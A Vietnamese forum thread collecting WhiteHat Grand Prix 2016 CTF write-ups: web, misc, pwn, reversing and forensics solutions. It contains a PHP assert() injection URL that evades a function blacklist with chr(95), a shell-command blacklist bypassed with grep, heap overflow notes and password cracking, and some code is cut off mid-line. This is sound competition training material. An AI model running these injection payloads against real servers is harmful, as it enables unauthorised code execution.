[Writeup] WhiteHat Grand Prix 2016

Topic này được tạo để các bạn chia sẻ, trao đổi, thảo luận về Writeup các bài thi tại WhiteHat Grand Prix 2016. Các bạn cùng tham gia nhé!

Các bài thi gồm có:

STT	Tên món ăn	Writeup1	Tên đội	Writeup2	Tên đội
1	Bánh bèo bì Bình Dương
2	Bánh bột chiên
3	Bánh bột lọc	Writeup[/URL]	rawsec
4	Bánh căn Ninh Thuận	Writeup[/URL]	p4	Writeup[/URL]	CLGTftMeePwn
5	Bánh canh Trảng Bàng – Tây Ninh	Writeup[/URL]	CLGTftMeePwn
6	Bánh Chưng	Writeup[/URL]	CLGTftMeePwn
7	Bánh cóng Sóc Trăng	Writeup[/URL]	CLGTftMeePwn
8	Bánh cuốn Thanh Trì	Writeup[/URL]	qt	Writeup[/URL]	ISITDTU
9	Bánh đa kế Bắc Giang	Writeup[/URL]	rawsec
10	Bánh Giày	Writeup[/URL]	rawsec	Writeup[/URL]	ISITDTU
11	Bánh ít lá gai Quy Nhơn	Writeup[/URL]	rawsec
12	Bánh khọt Bà Rịa – Vũng Tàu
13	Bánh mì	Writeup[/URL]	ISITDTU
14	Bánh phu thê Đình Bảng
15	Bánh răng bừa Hưng Yên
16	Bánh tằm bì Bạc Liêu
17	Bánh tráng cuốn thịt heo Đà Nẵng	Writeup[/URL]	qt
18	Bánh xèo	Writeup[/URL]	ISITDTU
19	Bún bò Huế
20	Bún bò Nam Bộ	Writeup[/URL]	217
21	Bún chả Hà Nội	Writeup[/URL]	ISITDTU
22	Cao lầu	Writeup[/URL]	217
23	Cao lầu Hội An
24	Chả cá lã vọng
25	Cháo lươn Nghệ An
26	Cơm gà Hội An	Writeup[/URL]	DauGau
27	Cơm hến Thừa Thiên Huế	Writeup[/URL]	LS
28	Cơm tấm Sài Gòn
29	Gỏi cuốn
30	Lẩu mắm U Minh
31	Mì Quảng	Writeup[/URL]	ISITDTU
32	Nem rán	Writeup[/URL]	DauGau
33	Phở Hà Nội
34	Phở khô Gia Lai
35	Xôi ngũ sắc Tây Bắc

 

Banh bot loc

Category Web Security | Teams having solved this 108 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

Description:

Solution:

Here is the home page:




The login link go to http://web05.grandprix.whitehatvn.co...password=guest and says noob.





Let’s see source code of teh web page:

Mã:

    hello
    
    [URL="index.php?username=guest&password=guest"]login[/URL]
    Login to get our secret

Ok, let’s see index.php.bak:

Mã:

Ok so the login checks that the concatenation of the username and the key is equal to the md5 hash of the password.

So we need to find a hash like ????????????????????????????1337 (28 random hex chars and 1337).

I first thought to download a md5 hash dictionary but I didn’t wanted to wait during teh download.

So I went to md5db.net and looked for a hash beginning with 0000, did a CTRL + F to find 1337 and finaly found one: # 13381 Hash 0000dd456d15560290351cb4e6311337 Word hdtfz.

So we get:

• username: 0000dd456d15560290351cb4e631
• key: 1337
• password: hdtfz

I submited the url: http://web05.grandprix.whitehatvn.co...password=hdtfz and got the flag

Mã:

WhiteHat{92ab818618fee438a1ea3944b5940237975f2b1d}

 

Banh da Ke


Category Miscellaneous | Teams having solved this 50 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

Description:

create_folder_player.py

Mã:

import os
import random
flag = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
count = 0
length = len(flag)
print length
arr = random.sample(range(0,10000),length)
arr = sorted(arr)
for k in range(0,10000):
    try:
        os.mkdir(str(k))
    except:
        pass
    if k in arr:
        f=open("./"+str(k)+"/"+os.urandom(8).encode("hex")+"."+os.urandom(8).encode("hex"),"w").write(str(flag[count]))
        count +=1

mics.py

Mã:

#!/usr/bin/env python
import os
import re
import sys
blaclist = "cat|nano|less|tail|vim|head|apt|install|wget|more|emacs|vi|subl|pico|bash|sh|rm|sed|nl|flag.hihi|`|%|\$|chmod|python"
myregrex = "\W*(?i)("+blaclist+")\W*"
cmd = ""
while(cmd != "exit"):
    sys.stdout.write("Input your command: \n")
    sys.stdout.flush()
    cmd = raw_input()
    check = re.findall(myregrex,cmd)
    if check!=[]:
        sys.stdout.write("rejected\n")
        sys.stdout.flush()
        continue
    try:
        #call()
        a ="XXXXXXXXXXXXX"
        a+=cmd
        os.system(a)
    except:
        sys.stdout.write("bad command\n")
        sys.stdout.flush()

Solution:

create_folder_player.py: there will be 10000 folders with one part of the flag in several of them choosen randomly.

• misc.py: lol, the spell. blaclist vs blacklist.
• misc.py: ok seriously, blacklist usage sucks so I wont do a script to send a ls for the all 10000 folders. I will simply find a command not blacklisted: grep.
• grep is magic, you can use all kind of regex and use it recursively:

Mã:

Input your command:
grep -r -E '*.*' .
./5256/7e8e1adc2c27d5ae.b20d7fe2eeee83a6:e
./5363/049185c04d8d4a6a.14b749db725281b6:p
./9149/e60247d6e9b86d66.538088287218f418:h
./6625/99c4b89e33717d68.4e7cfddc3ab792ab:m
./2961/af1fa87c94746adc.4ceba2ad4425295a:H
./5360/3b1d1d39b7cdfc5e.b3d700c19f7da568:3
./7520/be92bc1c03188333.8a0acf56d05e21f2:D
./9460/0990eb1ff5a0f0f4.2b8448627eda707d:4
./7261/85c5e9b11412182b.c8aa64a3e89d6116:4
./4464/bfb49af4d0d18330.0e0a92989ea0cd16:{
./8447/1383404de7cf99d1.801ee7e580554bf7:r
./9817/abb9dad1b91251c0.8aca51ae85b0a5a3:}
./2464/91001f84e6b7043c.362d39207f7113d5:e
./6089/0da7f2cf81b578bc.64aceb97e90d59b8:4
./7265/0d1d93183a71652c.f62fd332e6a893c7:n
./8042/45b7f42e37a7036d.4649801c191cd850:t
./8566/eb0eac89c6af6941.a01ee5abd0018d64:y
./1490/ce66a0652ef071e2.8e59cb623f5044db:i
./3391/d5bb02174118cd0a.8452e896dc972780:a
./9729/ff958bf095684403.ba220df0c0a00cbc:d
./5627/39835fcae4e0fb1e.d63a2b4f7cd6cc4d:_
./5754/01b98e405d1a6f5e.dfea13f68bf1d28c:c
./2124/0388bdb00dff778b.cf361e5e8cba7330:t
./8919/8b998e1b2d84792e.05c56576bc8a640c:_
./251/01fbe27318a591b2.32905c5f1c5d5be2:W
./6805/421c3e7b161f09e6.cb2d792b88d852d3:_
./7615/40672c2915963dc7.23d290b7ab5a23fe:_
./4983/29a3e67904c136c1.82698942425d3172:k
./4091/5d4d11679777c463.54a739cf22f2147f:t
./1477/76ed9a66da76f47c.fffc5ebba341f304:h
./6428/4ab16af8f7bea2ca.f326ac02efddd099:l
./9664/3a309f1c601603e8.949523481193df68:r

• Save the output in a text file.
• Let’s order that with a ruby script:

Mã:

#!/usr/bin/ruby
arr = []
File.open('misc04.txt').each do |line|
    # math the folderName, fileName and content of each file (one char)
    regex = line.match(/\/([0-9]{1,4})\/([a-f0-9]{16}\.[a-f0-9]{16}):(.)/)
    folderName = regex.captures[0]
    fileName = regex.captures[1]
    char = regex.captures[2]
    # convert folderName to int in order to be able to sort it the right way. Sort as int (2464 > 251), sort a string (2464 < 251).
    arr.push([folderName.to_i,fileName,char])
end
# sort by first col, so sort by fileName
arr.sort!
# display only chars (third column of each row)
arr.each{|r| print r[2]}

• Execute it:

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ ruby sorted.rb
WhiteHat{ke3p_c4lm_4nD_try_h4rd}

• Format the flag (WhiteHat{SHA1(flag)}):

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ printf %s 'WhiteHat{ke3p_c4lm_4nD_try_h4rd}' | sha1sum
1a05093adb0795d8e2f5b89985c43b85bcb11d19  -

• Submit the flag: WhiteHat{1a05093adb0795d8e2f5b89985c43b85bcb11d19}.

 

[h=4]Banh can[/h] Category Web Security | Teams having solved this 29 | Point 100 | Author: WhiteHat Wargame| Writeup: p4

Description:

Solution:

In the task we get a webpage with a form. We can input some data in the form and submit it, which causes redirection to:

Mã:

http://web04.grandprix.whitehatvn.com/index.php?hello=our_input

And it prints out Hello our_input.

There is also a hint in the source code that we can try calling function hint.

After a while we figure out that the parameter name is the function name and the value is string argument. This means we can go to:

Mã:

http://web04.grandprix.whitehatvn.com/index.php?hint

To call hint function. This functions shows us that there is a blacklist for some inputs:

Mã:

$blacklist = array("system", "passthru", "exec", "read", "open", "eval", "backtick", "", "_");`

We quickly notice that there is one function missing here, which enables us to call any PHP code from a string parameter -assert.

So we can call:

Mã:

http://web04.grandprix.whitehatvn.com/index.php?assert=phpinfo()

And it shows us phpinfo, with list of all disabled PHP functions. It seems there is no way of getting a shell, but maybe we don't need it. We decide to read index.php just to see what exactly we're dealing with.

While _ is blacklisted, we can just concatenate string with chr(95) instead so we call:

Mã:

http://web04.grandprix.whitehatvn.com/index.php?assert=assert(%27print(file%27.chr(95).%27get%27.chr(95).%27contents(%22index.php%22))%27)

in order to call assert('file_get_contents("index.php")')

and the flag is in the source code:

Mã:

WhiteHat{36b32e1f18a0da66de3b9dd29db947155b35320f}

 

Com ga Hoi An

Category Reverse Engineering | Teams having solved this 2 | Point 100 | Author: WhiteHat Wargame| Writeup: DauGau

Description:

Solution:

[video=youtube;yv8-A-ftgvA]https://www.youtube.com/watch?v=yv8-A-ftgvA[/video]​

 

Nem ran

Category Reverse Engineering | Teams having solved this 35 | Point 100 | Author: WhiteHat Wargame | Writeup: DauGau

Description:

Solution:

[video=youtube;ssMRYIPUzNM]https://www.youtube.com/watch?v=ssMRYIPUzNM[/video]​

 

Cảm ơn Mod whf đã tổng hợp, các đội có thể gửi luôn writeup vào đây.

 

Mình xin bổ sung writeup Bánh Xèo

 

Cảm ơn bài writeup của mod Sugi_b3o! Đối với những bài đã có writeup nhưng anh em có cách giải khác thì cứ mạnh dạn chia sẻ nhé.

 

Cao lau

Category: Pwnable | Teams having solved this: 1 | Point: 400 | Author: WhiteHat Wargame | Writeup: 217

Description:

Solution:

Basic Info

Attachments are two 32bit ELFs and one plaintext: note_trial_1, ptrace_32, blacklist.txt




The note_trial_1 binary is Full RELRO but no PIE enable. While it do have canary, the checksec of pwntools might have bugs.

The ptrace_32 binary is a sandbox, which use ptrace to forbid its child(i.e note_trial_1) from using syscalls listed inblacklist.txt.

We will see the forbidden syscalls later, let's focus on functions of note_trial_1 first.

Functions

(Only important functions are listed)

• Initialize notes:

Mã:

/*
struct Note {
  char name[32];
  char date[32];
  char body[300];
}; */
for(i = 0; i name, 32)
[*]readline(note->date, 32)
[*]readline(note->body, 300)
[/LIST]
[*]read:
[LIST]
[*]Input index
[*]Show contents of pool[index].
[/LIST]
[*]teencode:
[LIST]
[*]Input index
[*]note = pool[index];
[*]convert content of note->body to leetcode(e.g. A->4, C->[, M->|V|).
[/LIST]
[*]license:
[LIST]
[*]return if cafe != 0xcafebabe
[*]If input the correct five number license, will have [B]format string vulnerability[/B].
[*]cafe = 0xc4f3b4b3
[/LIST]
[/LIST][B]Vulnerability[/B]

One vulnerability has been described above: if input the correct license then we can use the [URL="https://www.owasp.org/index.php/Format_string_attack"]fmt string attack[/URL].

However, we don't know what the correct license is - if we don't know the random seed.

Another vulnerability is the command teencode, which converts M to |V|, K to |

 

Bun bo Nam Bo

Category: Pwnable | Teams having solved this: 2 | Point: 500 | Author: WhiteHat Wargame | Writeup: 217

Description:

Solution:

Basic Info

Attachments are two 32bit ELF note, note_client and glibc libc-2.19




Normal protection, no PIE and Partial RELRO.

Directly run binary note will face a punch of hex:




While it looks like as normal menu challenge in IDA:




Why there's hex code when running?

After analysis, all I/O in note has been encrypt/decrypt in some way:



Let's skip here, and see what does note_client do first:

Directly run will get:



With IDA we found it want to read a file named config.txt, and connect the hostort described in config.txt.

So we create config.txt with content 127.0.0.1 31337, and use ncat to create a socket service of note listen at 127.0.0.1:31337, then note_client:



It works!

Actually note_client just do the I/O encrypt/decrypt to communicate with note. So we can skip the enc/dec algorithm in note now and just use note_client to interact with note.

Info of note

• Initialize: pool = (Pool*)malloc(0x1000), with structure:

Mã:

struct Pool
{
  int limit;
  int alive_amount
  Note note[255];
};
struct Note
{
  int inuse;
  int sz;
  char *content;
};

Don't care limit, alive_amount, they are used for limit the amount of note not exceed 255.

Commands:

• list: print the content of notes with inuse is true
• read:
  1. check index is valid
  2. check note[index]->inuse is true
  3. show its date/name/body
• add: create a new note, steps show as follows:
  1. loop pool to find the first note with inuse is false
  2. Input a size, 32 content, 31)
  3. Input date：readn(note->content+32, 15)
  4. Input body: readn(note->content+48, size)
  5. note->inuse = true
  6. note->sz = size
• free: specific a index
  1. check index is valid
  2. check note[index]->inuse is true
  3. free(note[index]->content)
  4. note->inuse = false
• edit: specific a index
  1. check index is valid
  2. check note[index]->inuse is true
  3. Input name：readn(note->content, 31)
  4. Input date：readn(note->content+32, 15)
  5. Input body: readn(note->content+48, note->sz)

Vulnerability

There're many incorrect bounding check in note, but all of them are few dangers. The only crackable vulnerability is there's a buffer overflow in input function. The implementation of input looks like this: (not exactly because there's decrypt algo. in origin, follows is a simplified version):

Mã:

void readn(char *output, int len) {
  int i=0, c;
  while((c = getchar()) != '\n') {
    output[i++] = c;
    if(i >= len) break;
  }
  output[i] = c;
}

If the input length is exactly len and the last character is not line break, then will cause one null-byte overflow.

Exploit

Remain is our favorite heap exploit.


Information Leak

Since we can only overflow one null-byte, we must overflow the size of next heap chunk. First use the command add to construct our heap layout:

After add(36); add(36); add(316); add(36); add(36), heap will look like this:

Mã:

+---------------+---------+---------+------------------+---------+---------+-----------+
| pool: 0x1009  | 0: 0x59 | 1: 0x59 |     2: 0x171     | 3: 0x59 | 4: 0x59 | top_chunk |
+---------------+---------+---------+------------------+---------+---------+-----------+

Then free the first note(free(0)), and trigger overflow when editing the second note(edit(1)):

Mã:

           |------- 0xb0 ------|
+----------+---------+---------+----------------+-+---------+---------+-----------+
|  0x1009  | 0: 0x59 | 1: 0x58 | 2: 0x100(fake) | | 3: 0x59 | 4: 0x59 | top_chunk |
+----------+---------+---------+----------------+-+---------+---------+-----------+
           |  freed  |         | prev_size(0xb0)| |
           +---------+         +----------------+-+

Since the chunk size of note 2 has been changed to 0x100, which implys its prev_inuse bit is zero, now free it(free(2)) will trigger the chunk merge between note 0 and note 2:

Mã:

+----------+---------+---------+-----------+------+---------+---------+-----------+
|  0x1009  |            0x1b1              | 0x70 | 3: 0x59 | 4: 0x59 | top_chunk |
+----------+---------+---------+-----------+------+---------+---------+-----------+
                     | 1: 0x58 |

 

[h=4]Banh Giay[/h] Category Forensics | Teams having solved this 14 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

Description:

Solution:

• Download the zip.
• Extract it.
• Open the pcapng with Wireshark.
• Filter http requests.
• See frame n°134 GET /corporation/secret HTTP/1.1.
• Extract the file (File > Export Objects > HTTP).
• Check the type of file:

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ file secret
secret: Zip archive data, at least v2.0 to extract

• Unzip it:

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ unzip secret
Archive:  secret
[secret] EasyExtrack password:

• Ok, there is a pasword, let’s check the html page: frame n°149 GET /corporation/arsenal.html HTTP/1.1.
• Extract it from the pcapng.
• See the hint: For H.i.n.t: Referring to arsenal, i remember a number. It also length of secret p.a.s.s.w.o.r.d.
• One key event is:

• With luck and guessing I found this number was 4.
• So now let’s try to crack the zip password with fcrackzip:

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ fcrackzip -b -c a -l 4 -u secret
PASSWORD FOUND!!!!: pw == fuzu

• Extract the zip with the password.
• Check what file type EasyExtrack is:

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ file EasyExtrack
EasyExtrack: Zip archive data, at least v1.0 to extract

• Try to unzip it with the same password:

Mã:

[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ unzip EasyExtrack -d out
Archive:  EasyExtrack
   creating: out/EasyExtrack/
[EasyExtrack] EasyExtrack/flag1.txt password:
  inflating: out/EasyExtrack/flag1.txt  
  inflating: out/EasyExtrack/flag10.txt  
  inflating: out/EasyExtrack/flag11.txt  
  inflating: out/EasyExtrack/flag12.txt  
  inflating: out/EasyExtrack/flag13.txt  
  inflating: out/EasyExtrack/flag14.txt  
  inflating: out/EasyExtrack/flag15.txt  
  inflating: out/EasyExtrack/flag16.txt  
  inflating: out/EasyExtrack/flag17.txt  
  inflating: out/EasyExtrack/flag18.txt  
  inflating: out/EasyExtrack/flag19.txt  
  inflating: out/EasyExtrack/flag2.txt  
  inflating: out/EasyExtrack/flag20.txt  
  inflating: out/EasyExtrack/flag21.txt  
  inflating: out/EasyExtrack/flag22.txt  
  inflating: out/EasyExtrack/flag23.txt  
  inflating: out/EasyExtrack/flag24.txt  
  inflating: out/EasyExtrack/flag25.txt  
  inflating: out/EasyExtrack/flag26.txt  
  inflating: out/EasyExtrack/flag27.txt  
  inflating: out/EasyExtrack/flag28.txt  
  inflating: out/EasyExtrack/flag29.txt  
  inflating: out/EasyExtrack/flag3.txt  
  inflating: out/EasyExtrack/flag30.txt  
  inflating: out/EasyExtrack/flag4.txt  
  inflating: out/EasyExtrack/flag5.txt  
  inflating: out/EasyExtrack/flag6.txt  
  inflating: out/EasyExtrack/flag7.txt  
  inflating: out/EasyExtrack/flag8.txt  
  inflating: out/EasyExtrack/flag9.txt

• Here are all the flags:

Mã:

raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{12f54a96f6444324693t0da001cafda8b}
raw: Flag{60b725f10c9c85c70d9h7880dfe8191b3}
raw: Flag{f5302386464f953ed58u1edac03556e55}
raw: Flag{d9bed3b7e151f11b8fdyadf75f1db96d9}
raw: Flag{3b5d5c3712955042212n316173ccf37be}
raw: Flag{72cfd272ace172fa3502h6445fbef9b03}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{9a8ad92c50cae39aa2c5604pfd0ab6d8c}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{12f54a96f64443s246930da001cafda8b}
raw: Flag{92520a5a9cf8932i20b9cd447f585f144}
raw: Flag{01fbdc44ef819db6p273bc30965a23814}
raw: Flag{9ffbf43126e33be52hcd2bf7e01d627f9}
raw: Flag{12f54a96f644432469o30da001cafda8b}
raw: Flag{9d7bf075372908f55e2nd945c39e0a613}
raw: Flag{92520a5a9cf893220b9cud447f585f144}
raw: Flag{009520053b00386d1173fu3988c55d192}
raw: Flag{e73af36376314c7c0022cbk1d204f76b3}
raw: Flag{e85dde330c34efb0e526ee3j082e4353b}
raw: Flag{7d9d25f71cb8a5aba8620254l0a20d405}

• Flags are not hashes because they are 33 char long. But we can see there is one non-hex char in each flag.
• Remove each non-hex flag to get 32 char long MD5 hashed:

Mã:

d2a33790e5bf28b33cdbf61722a06989
12f54a96f64443246930da001cafda8b
60b725f10c9c85c70d97880dfe8191b3
f5302386464f953ed581edac03556e55
d9bed3b7e151f11b8fdadf75f1db96d9
3b5d5c3712955042212316173ccf37be
72cfd272ace172fa35026445fbef9b03
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
9a8ad92c50cae39aa2c5604fd0ab6d8c
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
12f54a96f64443246930da001cafda8b
92520a5a9cf893220b9cd447f585f144
01fbdc44ef819db6273bc30965a23814
9ffbf43126e33be52cd2bf7e01d627f9
12f54a96f64443246930da001cafda8b
9d7bf075372908f55e2d945c39e0a613
92520a5a9cf893220b9cd447f585f144
009520053b00386d1173f3988c55d192
e73af36376314c7c0022cb1d204f76b3
e85dde330c34efb0e526ee3082e4353b
7d9d25f71cb8a5aba86202540a20d405

• The extracted wrong letters are (in order): xthuynhxxxpxxxxxxxxsiphonuukjl.
• Use hashkiller.co.uk to decrypt MD5 hashes:

Mã:

  
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
12f54a96f64443246930da001cafda8b MD5 : l
60b725f10c9c85c70d97880dfe8191b3 MD5 : a
f5302386464f953ed581edac03556e55 MD5 : g
d9bed3b7e151f11b8fdadf75f1db96d9 MD5 : {
3b5d5c3712955042212316173ccf37be MD5 : b
72cfd272ace172fa35026445fbef9b03 MD5 : r
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
9a8ad92c50cae39aa2c5604fd0ab6d8c MD5 : f
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
12f54a96f64443246930da001cafda8b MD5 : l
92520a5a9cf893220b9cd447f585f144 MD5 : _
01fbdc44ef819db6273bc30965a23814 MD5 : h
9ffbf43126e33be52cd2bf7e01d627f9 MD5 : e
12f54a96f64443246930da001cafda8b MD5 : l
9d7bf075372908f55e2d945c39e0a613 MD5 : p
92520a5a9cf893220b9cd447f585f144 MD5 : _
009520053b00386d1173f3988c55d192 MD5 : y
e73af36376314c7c0022cb1d204f76b3 MD5 : o
e85dde330c34efb0e526ee3082e4353b MD5 : u
7d9d25f71cb8a5aba86202540a20d405 MD5 : }

• Unformated flag is: Flag{brFFFfFFFFFFFFl_help_you}.
• SHA1 the unformated flag:

Mã:

[noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
$ printf %s 'Flag{brFFFfFFFFFFFFl_help_you}' | sha1sum
e7643ccd180c84176ae0b4361c3b169fceacf961  -

• Format the flag: WhiteHat{e7643ccd180c84176ae0b4361c3b169fceacf961}.
• Not the good flag …

Note that 800618943025315f869e4e1f09471012 is the right md5 hash for F andd2a33790e5bf28b33cdbf61722a06989 is the wrong md5 hash for F that you can obtain with non POSIX tools like echo (that’s why I use printf). So only hashkiller knows both wrong and right hash, all other md5 decrypt online tools knows only the right one so they are not able to decrypt d2a33790e5bf28b33cdbf61722a06989. But anyway…

• You know what? After some wasted hours I figured that I needed to replace F with some guessed letters:Flag{bruteforce_will_help_you}. Yes guessing again.
• SHA1 the unformated flag:

Mã:

[noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
$ printf %s 'Flag{bruteforce_will_help_you}' | sha1sum
1e71b26aa01733cd13e5199386c70fe31df43deb  -

• Format the flag: WhiteHat{1e71b26aa01733cd13e5199386c70fe31df43deb}.
• Not the good flag …
• Description said Submit: WhiteHat{SHA1(flag)}, it depends if flag means Flag{xxx} or xxx.
• SHA1 the unformated flag:

Mã:

[noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
$ printf %s 'bruteforce_will_help_you' | sha1sum                                                                    
31bd8aa56447ea1c703d0943e175a06a5c4ee614  -

• Format the flag: WhiteHat{31bd8aa56447ea1c703d0943e175a06a5c4ee614}.
• This time this is the good one.

Here was my ruby script:

Mã:

#!/usr/bin/ruby
(1..30).each do |num|
    raw_flag = File.read('flag'+num.to_s+'.txt')
    # Not sanitized flags
    puts 'raw: '.concat(raw_flag)
    only_flag = raw_flag.match(/\{([a-z0-9]{33})\}/).captures[0]
    # Sanitized flags
    puts only_flag.gsub(/[^0-9a-fA-F]/, '')
end

 

Writeup bài Cơm hến by LS



Summary: Reverse engineering of a Game Boy ROM and computation of the key with Z3.

Tools:

• BGB GameBoy Emulator/Debugger
• Z3 Theorem Prover

This is a write-up for the “Com hen” challenge from WhiteHat GrandPrix 2016 CTF.

The provided binary is a Game Boy ROM prompting for a key:





Inputting a wrong key results in this:






I started by looking at the strings:






This sure looks interesting but there is no xrefs for these strings. However, searching for immediate values leads us to an interesting function with two basic blocks at the end:





Since each of these basic blocks are referencing respectively success and fail strings, we can safely assume that sub_1DDD is used to print strings.

After some renaming and immediate to offset conversions we end up with the following:





Let’s see the code path we need to follow to end in the success basic block:





The first check is in the first basic block. In order to get some context, I am putting a breakpoint at 0x5A6 in BGB and provide the following input:
ABCDEFGHIJKLMNOPQRSTUVWXYZ




When the breakpoint triggers, we can see that the code is actually comparing the byte at 0xC0B7 to 0x45, ie, the 24th char of our input must be an ‘E’.

Also, we can see that our input is stored at 0xC0A0 and that there is the following 32 bytes string at 0xC0D2:
3YU8UV86XYZY4W4659756ZUY69582043
Back to our function, the second check depends on the “de” register which is set by sub_86A:





Which is nothing more than a string compare function, loading two strings from the stack and outputting the result in the “de” register.

Now let’s get some context with a breakpoint at 0x86A and the following input (‘E’ at the 24th position in order to pass the first check):
ABCDEFGHIJKLMNOPQRSTUVWEYZ




The two compared strings are at 0xC0A0 and 0xC0D2, ie, our input and the mysterious 32 bytes string.

Moreover, our input changed, it is now:

VWXYZABCDEFGHIJKLMNOPQRZTU

Looks like a dumb ROT(21). However, trying to input ROT(-21, “3YU8UV86XYZY4W4659756ZUY69582043”) as key does not work.

I then started to look at sub_4E0 since it is the only function that is called between the first check and the strcmp.

The function is rather long, but after some RE, the algorithm is actually quite simple. Here is the equivalent C code:

Mã:

// Check if c is a number short sub_436(unsigned char c) { return c = '0'; } // Get distance between c1 and c2 short sub_40D(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } // Do one hash round void sub_457(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } // Hash the key void sub_4E0(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; short distance = sub_40D(last, *i); sub_457(key, last, distance); last = *i; } }

Thus, the crackme is equivalent to the following C program:

Mã:

#include  #include  short is_number(unsigned char c) { return c = '0'; } short get_distance(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } void hash_round(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } void hash_key(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; short distance = get_distance(last, *i); hash_round(key, last, distance); last = *i; } } int main(void) { unsigned char key[50]; gets(key); hash_key(key); if (!strcmp("3YU8UV86XYZY4W4659756ZUY69582043", key)) puts("Success"); else puts("Fail"); }

Let’s fire up Z3:

Mã:

#! /usr/bin/env python2 from z3 import * def abs(x): return If(x >= 0, x, -x) def adjust(x): return If(x

 

[h=3]Writeup bài Banh it la gai by rawsec

Description[/h]

Submit: WhiteHat{SHA1(flag)}

http://material.grandprix.whitehatvn.com/gp2016/For02_3603cb82230e3f6eb669a65f455e92b74659c2cc.zip

http://bakmaterial.grandprix.whiteh..._3603cb82230e3f6eb669a65f455e92b74659c2cc.zip

Alternative server on amazon in case of low traffic:

http://54.183.97.137/gp2016/For02_3603cb82230e3f6eb669a65f455e92b74659c2cc.zip​

[h=2]Solution[/h]
TL;DR: incomplete write-up.

• Download the zip.
• Extract it.
• We have a raw image.
• Let’s see what we can do with Volatility:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ volatility -f bkav5.raw imageinfo Volatility Foundation Volatility Framework 2.5 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86) AS Layer1 : IA32PagedMemoryPae (Kernel AS) AS Layer2 : FileAddressSpace (/home/noraj/CTF/WhiteHat_GrandPrix/2016/For2/bkav5.raw) PAE type : PAE DTB : 0x334000L KDBG : 0x8054d2e0L Number of Processors : 2 Image Type (Service Pack) : 3 KPCR for CPU 0 : 0xffdff000L KPCR for CPU 1 : 0xfd24c000L KUSER_SHARED_DATA : 0xffdf0000L Image date and time : 2016-11-06 16:47:44 UTC+0000 Image local date and time : 2016-11-06 23:47:44 +0700 [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ volatility -f bkav5.raw --profile=WinXPSP2x86 pstree Volatility Foundation Volatility Framework 2.5 Name Pid PPid Thds Hnds Time -------------------------------------------------- ------ ------ ------ 